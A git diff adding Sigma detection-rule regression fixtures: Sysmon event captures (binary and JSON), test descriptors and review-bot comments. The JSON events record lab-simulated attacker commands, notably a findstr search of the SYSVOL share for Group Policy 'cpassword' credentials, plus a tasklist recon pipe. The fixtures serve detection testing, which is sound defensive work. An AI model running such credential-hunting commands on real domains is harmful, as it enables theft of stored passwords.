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 bzkWXT-+ZiX!jhf`KAmgA?86p!!_WT#)gf{! literal 0 HcmV?d00001 
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json new file mode 100644 index 000000000..98a4da0c2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:50:13.199218Z" + } + }, + "EventRecordID": 9105822, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:50:13.191", + "ProcessGuid": "5AA13A44-D595-68FC-0A31-000000004002", + "ProcessId": 7772, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr /S cpassword \\\\AR-WIN-DC\\sysvol\\*.xml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
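Review bot: the JSON rendering of this event is not referenced anywhere in info.yml (only the .evtx path appears under regression_tests_info), so it is unclear whether the CI script consumes this file or whether it exists only so reviewers can read the fixture without an evtx parser. A short statement of its role (in info.yml or the workflow's documentation) would help, for example "derived from the .evtx for readability, not used by the test"; if it is consumed, it should be listed in the test entry so the two cannot drift apart when the evtx is regenerated. Also worth recording which fields the rule is expected to match on (here the `CommandLine` and `Image` values), since fields such as `EventRecordID`, `TimeCreated` and `Hashes` are capture-specific and will change with any re-export.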
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml new file mode 100644 index 000000000..2ad8b04be --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml @@ -0,0 +1,13 @@ +id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 91a2c315-9ee6-4052-a853-6f6a8238f90d + title: Findstr GPP Passwords +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx 
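Review bot: `description: N/A` leaves the fixture undocumented; a one-line description of what the capture contains (a single Sysmon EventID 1 for findstr.exe with the `/S cpassword` switch against the SYSVOL share, matching rule 91a2c315-9ee6-4052-a853-6f6a8238f90d exactly once) would make `match_count: 1` self-explanatory to whoever next touches this test. Also `date: 2025-10-24` is one day before the event's own `SystemTime` (2025-10-25T13:50:13Z) in the accompanying JSON; worth confirming whether the field is meant to record the capture date or the date the fixture was added, and documenting that in the schema so future entries are consistent.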
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d02e83bf9bb33c07cb2e0518f2e3fee12377172f GIT binary patch literal 69632
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 I`97up2P0_5*8l(j literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json new file mode 100644 index 000000000..610578ece --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:51:29.178909Z" + } + }, + "EventRecordID": 9129415, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:51:29.168", + "ProcessGuid": "5AA13A44-D5E1-68FC-1131-000000004002", + "ProcessId": 3384, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr powershell\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
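Review bot: this companion JSON for ccb5742c records only the cmd.exe wrapper event (ProcessId 3384, CommandLine `cmd /c "tasklist | findstr powershell"`), whereas the sibling capture for 4fe074b4 keeps all three processes of the pipeline (cmd.exe, tasklist.exe and findstr.exe). If the .evtx was trimmed the same way, the test only proves the rule fires on the wrapper line and says nothing about whether the bare child `findstr powershell` event is matched or skipped; capture the children as well so the expected match count pins down which event the rule is meant to hit.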
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml new file mode 100644 index 000000000..2a5e7846c --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml @@ -0,0 +1,13 @@ +id: 5bb16f46-e370-4a40-a47a-d047e4482fc1 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ccb5742c-c248-4982-8c5c-5571b9275ad3 + title: Recon Command Output Piped To Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx 
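Review bot: `description: N/A` leaves the simulation undocumented; replace it with what was actually executed so the capture can be reproduced when the rule changes, e.g. `description: Ran cmd /c "tasklist | findstr powershell" from an elevated cmd.exe on ar-win-dc (Sysmon EventID 1)`. The `date: 2025-10-24` also predates the capture timestamps in the event data (2025-10-25), which is fine for a creation date but worth a second look. Finally, `path:` points only at the .evtx; if the .json beside it is a human-readable companion rather than a test input, say so in the description, since nothing in the visible hunks consumes it.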
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx new file mode 100644 index 0000000000000000000000000000000000000000..4793bbbe0af8079af0195d4362044f1083382c90 GIT binary patch literal 69632 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 